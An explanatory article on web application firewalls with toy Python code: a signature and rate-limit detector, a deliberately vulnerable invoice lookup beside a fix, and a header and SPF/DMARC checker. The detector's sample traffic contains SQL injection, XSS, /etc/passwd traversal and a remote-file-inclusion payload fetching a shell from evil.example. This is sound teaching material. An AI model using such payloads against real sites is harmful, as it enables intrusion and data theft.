A web application firewall (WAF) sits between the internet and your web application and inspects every incoming HTTP request. Requests that match known attack patterns — SQL injection, cross-site scripting, path traversal, malicious bots — get blocked before they ever reach your code. Legitimate traffic passes through unchanged.
Think of it as a bouncer for your web server: it doesn't change what your application does, it just decides what is allowed to talk to it.
What a WAF protects against
WAFs are built around the OWASP Top 10, the widely used list of the most common web application risk categories. A managed ruleset covers the request-level attacks in that list well; the more application-specific categories (broken access control, broken authentication) it can only partly address. The main ones:
- SQL injection — attempts to manipulate database queries through user input
- Cross-site scripting (XSS) — injecting malicious scripts into pages viewed by other users
- Cross-site request forgery (CSRF) — tricking authenticated users into making unwanted requests; some WAFs can check Origin/Referer headers or require an anti-CSRF token on state-changing requests, but the token itself has to come from your application
- Path traversal / directory traversal — requesting files outside the web root
- Remote file inclusion — supplying a URL where the application expects a filename, so that it fetches and runs remote code
- Probes for sensitive paths — requests for admin panels, backup files, .git directories or config files (a WAF blocks the known-bad paths; it cannot know which of your own URLs a given user is allowed to see, see "What a WAF doesn't protect" below)
- Bot traffic and scraping — automated abuse, credential stuffing, rate-limit evasion
- Bot traffic and scraping — automated abuse, credential stuffing, rate-limit evasion
How WAFs work: rules and anomaly detection
Most WAFs use two approaches, often combined:
Rule-based (signature) matching — the WAF keeps a list of known attack patterns (strings like UNION SELECT, <script> in input, ../ sequences, unusual URL shapes) and blocks requests that match. Rules are maintained and updated by the WAF vendor or, for open-source engines, by a community project such as the OWASP Core Rule Set. This catches known attacks reliably but can miss novel ones, and it only works if the WAF decodes the request the way the application will (URL encoding, double encoding, mixed case) before matching; otherwise a trivially re-encoded payload walks straight past it. Broad rules also produce false positives that block legitimate users, which is why every serious WAF offers a detection-only or logging mode for tuning before you switch to blocking.
Anomaly / rate-based detection — the WAF watches for behaviour that deviates from normal baselines: hundreds of requests per second from one IP, repeated authentication failures, unusual geographic patterns. This catches automated abuse that has no fixed signature (credential stuffing, scraping, brute force) and can flag exploitation attempts that no rule yet describes, as long as they look abnormal.
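To make the two approaches concrete, here is a toy WAF engine added as an example for this article; it is not code from any vendor's product. It runs constructed sample traffic through a few illustrative signatures (after URL-decoding, the step naive filters forget) and through a per-IP sliding window for both raw request rate and failed logins. The rule names, thresholds, sample requests and IP addresses are all assumptions made for the illustration.

```python
import re
import urllib.parse
from collections import defaultdict, deque

# Illustrative signatures only; a managed ruleset such as the OWASP Core Rule Set
# carries thousands of far more careful patterns.
SIGNATURES = [
    ("sqli",      re.compile(r"\bunion\b.+\bselect\b|'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I)),
    ("xss",       re.compile(r"<\s*script\b|javascript\s*:|\bon(?:error|load|click|mouseover)\s*=", re.I)),
    ("traversal", re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")),
    ("rfi",       re.compile(r"=\s*(?:https?|ftp)://", re.I)),
]


def normalize(value: str) -> str:
    """URL-decode up to twice so %27 and double-encoded %2527 both become a quote.
    Matching the raw bytes instead is the classic way a rule gets bypassed."""
    for _ in range(2):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def match_signatures(request: dict) -> list:
    """Names of every signature rule the request path+query triggers."""
    haystack = normalize(request["path"])
    return [name for name, pattern in SIGNATURES if pattern.search(haystack)]


class SlidingWindow:
    """Per-IP sliding-window counter: more than `limit` events in `window`
    seconds is flagged. Used for both raw request rate and failed logins."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.events = defaultdict(deque)

    def hit(self, ip: str, ts: float) -> bool:
        q = self.events[ip]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        return len(q) > self.limit


def inspect(requests: list, rate_limit: int = 20, fail_limit: int = 10,
            window: float = 10.0) -> list:
    """Run each request through both detectors, in arrival order.
    Returns (ip, path, verdict, reasons) per request. `status` is the response
    code the WAF observed; a real WAF would apply a failed-login block to the
    client's *next* request, here it simply flags once the threshold is crossed."""
    rate, fails = SlidingWindow(rate_limit, window), SlidingWindow(fail_limit, window)
    results = []
    for r in requests:
        reasons = match_signatures(r)
        if rate.hit(r["ip"], r["ts"]):
            reasons.append("rate")
        if r["status"] == 401 and fails.hit(r["ip"], r["ts"]):
            reasons.append("auth-failures")
        results.append((r["ip"], r["path"], "block" if reasons else "allow", reasons))
    return results


# Constructed sample traffic (RFC 5737 documentation addresses, not real clients).
SAMPLE_REQUESTS = [
    {"ip": "203.0.113.5",  "ts": 0.0, "status": 200, "path": "/products?id=42"},
    {"ip": "203.0.113.5",  "ts": 0.5, "status": 200,
     "path": "/products?id=42%27%20UNION%20SELECT%20username,password%20FROM%20users--"},
    {"ip": "198.51.100.9", "ts": 1.0, "status": 200, "path": "/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"},
    {"ip": "198.51.100.9", "ts": 1.2, "status": 404, "path": "/static/..%2f..%2f..%2fetc/passwd"},
    {"ip": "198.51.100.9", "ts": 1.3, "status": 200, "path": "/page.php?file=http://evil.example/shell.txt"},
    # Well-formed request for someone else's invoice: nothing here for a WAF to match.
    {"ip": "192.0.2.77",   "ts": 2.0, "status": 200, "path": "/invoices/1002"},
] + [
    # Credential stuffing: thirty failed logins from one address in three seconds.
    {"ip": "192.0.2.200", "ts": 3.0 + i * 0.1, "status": 401, "path": "/login"}
    for i in range(30)
]

if __name__ == "__main__":
    for ip, path, verdict, reasons in inspect(SAMPLE_REQUESTS):
        print(f"{verdict:5} {ip:14} {path[:60]:60} {','.join(reasons)}")
```

The four encoded payloads are blocked only because `normalize` runs first; the stuffing client is blocked by the failure counter long before the raw rate limit trips; and the request for `/invoices/1002` is allowed, which is exactly the kind of request the later section on logic flaws is about.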
Types of WAF
- Cloud-based WAF (most common) — traffic is routed through the provider's network, which inspects and filters it before forwarding clean requests to your server. Cloudflare, AWS WAF, Fastly, Imperva and Akamai all offer this. Low setup friction, scales automatically, managed rule updates. A free tier is available on Cloudflare for basic protection. One caveat: the WAF only sees traffic that goes through the provider, so your origin server must accept connections only from the provider's IP ranges (or over an authenticated tunnel); an attacker who discovers the origin address otherwise bypasses it entirely.
- Host-based WAF — installed on your web server (e.g. ModSecurity with the OWASP Core Rule Set on Nginx/Apache). No external routing required, and the origin-bypass problem does not arise, but you're responsible for rules, updates and tuning.
- Network appliance — a dedicated hardware or virtual device in your data centre. Common in enterprises with strict data-residency requirements.
What a WAF doesn't protect
A WAF inspects HTTP traffic — it can't protect everything:
- Logic flaws — a WAF can't know your business rules. If your application lets any logged-in user view any other user's invoices, a WAF won't catch that.
- Broken authentication — weak passwords, missing MFA, session management bugs.
- Server-side misconfigurations — exposed admin panels, default credentials, missing security headers, open S3 buckets.
- Supply-chain attacks — a compromised third-party script or dependency.
- Email-based attacks — phishing, spoofing and BEC are entirely out-of-band from your web traffic.
A WAF is one layer. It doesn't replace secure coding, proper authentication, security headers, email authentication or regular scanning.
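The invoice case above, as an added example (not code from the article): a lookup-by-ID handler beside its hardened form. The exploiting request, `GET /invoices/1002` sent from alice's session, is ordinary HTTP, so no signature or rate rule fires; only the application's own ownership check can stop it. The invoice data, users and function names are constructed for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str
    amount: float


# Constructed sample data standing in for the invoices table.
INVOICES = {
    1001: Invoice(1001, "alice", 120.00),
    1002: Invoice(1002, "bob", 980.50),
}


class NotFound(Exception):
    pass


def get_invoice_vulnerable(session_user: str, invoice_id: int) -> Invoice:
    """Looks up by ID alone, so any logged-in user can read any invoice.
    The request that exploits this (GET /invoices/1002 from alice's session)
    is byte-for-byte ordinary HTTP; a WAF has no pattern to match."""
    return INVOICES[invoice_id]


def get_invoice_hardened(session_user: str, invoice_id: int) -> Invoice:
    """Scopes the lookup to the caller's own records. Missing and foreign
    invoices get the same answer, so the endpoint also does not leak which IDs exist."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.owner != session_user:
        raise NotFound(invoice_id)
    return inv


def handle(lookup, session_user: str, path: str) -> tuple:
    """Minimal router for GET /invoices/<id>; returns (status, body)."""
    m = re.fullmatch(r"/invoices/(\d+)", path)
    if not m:
        return 404, "not found"
    try:
        inv = lookup(session_user, int(m.group(1)))
    except (KeyError, NotFound):
        return 404, "not found"
    return 200, f"invoice {inv.id} for {inv.owner}: {inv.amount:.2f}"


if __name__ == "__main__":
    # Alice's session asking for Bob's invoice.
    print(handle(get_invoice_vulnerable, "alice", "/invoices/1002"))  # leaks Bob's data
    print(handle(get_invoice_hardened, "alice", "/invoices/1002"))    # (404, 'not found')
```

The fix is a query scoped to the authenticated user, not a filter on the URL; trying to express this as a WAF rule ("block alice from /invoices/1002") does not scale past one user and one record.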
Do small businesses need a WAF?
If your site runs an e-commerce checkout, a login flow, or any user-submitted data — yes, a WAF adds meaningful protection for relatively little effort. Cloudflare's free plan, for example, gives you a basic managed WAF ruleset, DDoS mitigation and a CDN once you move your domain's nameservers to Cloudflare and proxy the records through their network; the fuller managed rulesets, including the OWASP Core Ruleset, are on paid plans. For a WordPress site or a WooCommerce store, this is one of the most impactful things you can do for under an hour of setup time, provided you also lock the origin down so it only accepts Cloudflare's traffic.
For a purely static informational site with no logins or forms, the risk is lower — but the protection is still cheap enough that there's little reason to skip it.
WAF vs other controls
| Control | Protects against | What it doesn't cover |
|---|---|---|
| WAF | Injection-style attacks from the OWASP Top 10, bots, application-layer DDoS | Logic flaws, broken authentication, email attacks, traffic sent straight to the origin |
| Security headers | XSS (CSP), clickjacking, HTTPS downgrade | Server-side attacks |
| Email auth (SPF/DKIM/DMARC) | Spoofing, phishing | Web vulnerabilities |
| Regular scanning | Misconfiguration, missing records | Zero-days in code |
How to check your site's current protections
Start with what's visible from the outside: your DNS and email security records, your HTTPS setup and your response headers. A passive scan checks all of these at once and tells you, in plain English, what's missing. It can't see your WAF rules or your application code — but it surfaces the gaps that are easiest to find and most commonly exploited. Scan your domain free and see your grade in about ten seconds.
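As an added example, independent of any scanning service, here is what such a passive check does with the information it can see: it grades a set of response headers and the SPF and DMARC TXT records against the controls in the table above. The HTTP and DNS fetching is left out so it runs offline; the header sets and DNS records are constructed inputs, one for a typical unhardened site and one for a hardened one.

```python
# Headers a passive scan looks for, with the attack class each one addresses.
EXPECTED_HEADERS = {
    "strict-transport-security": "HTTPS downgrade / SSL stripping",
    "content-security-policy": "cross-site scripting",
    "x-frame-options": "clickjacking",
    "x-content-type-options": "MIME sniffing",
    "referrer-policy": "referrer leakage",
}


def missing_headers(headers: dict) -> dict:
    """Map of absent security headers to the risk each would have covered.
    Header names are case-insensitive, so compare in lower case."""
    present = {name.lower() for name in headers}
    return {h: why for h, why in EXPECTED_HEADERS.items() if h not in present}


def check_spf(txt_records: list) -> str:
    """Judge the SPF record among a domain's TXT records. Simplification:
    redirect= modifiers are not followed, only the terminating all mechanism."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return "missing"
    if len(spf) > 1:
        return "invalid: more than one SPF record"
    last = spf[0].split()[-1].lower()
    if last in ("-all", "~all"):
        return f"ok ({last})"
    if last in ("+all", "all"):
        return "ineffective: +all authorises every sender"
    if last == "?all":
        return "neutral: ?all enforces nothing"
    return "incomplete: no terminating all mechanism"


def check_dmarc(txt_records: list) -> str:
    """Judge the DMARC record found at _dmarc.<domain>."""
    recs = [r for r in txt_records if r.upper().startswith("V=DMARC1")]
    if not recs:
        return "missing"
    tags = {}
    for part in recs[0].split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    policy = tags.get("p")
    if policy in ("quarantine", "reject"):
        return f"enforcing (p={policy})"
    if policy == "none":
        return "monitor only (p=none): spoofed mail is still delivered"
    return "invalid: no p tag"


def report(headers: dict, spf_txt: list, dmarc_txt: list) -> dict:
    """Combine the three checks into one findings dict."""
    return {
        "missing_headers": missing_headers(headers),
        "spf": check_spf(spf_txt),
        "dmarc": check_dmarc(dmarc_txt),
    }


# Constructed inputs: what a typical unhardened small-business site looks like
# from outside, next to a hardened one.
WEAK_HEADERS = {"Server": "nginx", "Content-Type": "text/html", "X-Frame-Options": "DENY"}
WEAK_SPF = ["v=spf1 include:_spf.google.com ?all"]
WEAK_DMARC = ["v=DMARC1; p=none; rua=mailto:dmarc@example.com"]

GOOD_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}
GOOD_SPF = ["v=spf1 include:_spf.google.com -all"]
GOOD_DMARC = ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"]

if __name__ == "__main__":
    print(report(WEAK_HEADERS, WEAK_SPF, WEAK_DMARC))
    print(report(GOOD_HEADERS, GOOD_SPF, GOOD_DMARC))
```

Two findings that such a check surfaces repeatedly: an SPF record ending in `?all` or `+all` looks present but authorises nothing, and a DMARC record at `p=none` only reports spoofing without stopping it. Neither is something a WAF can see or fix.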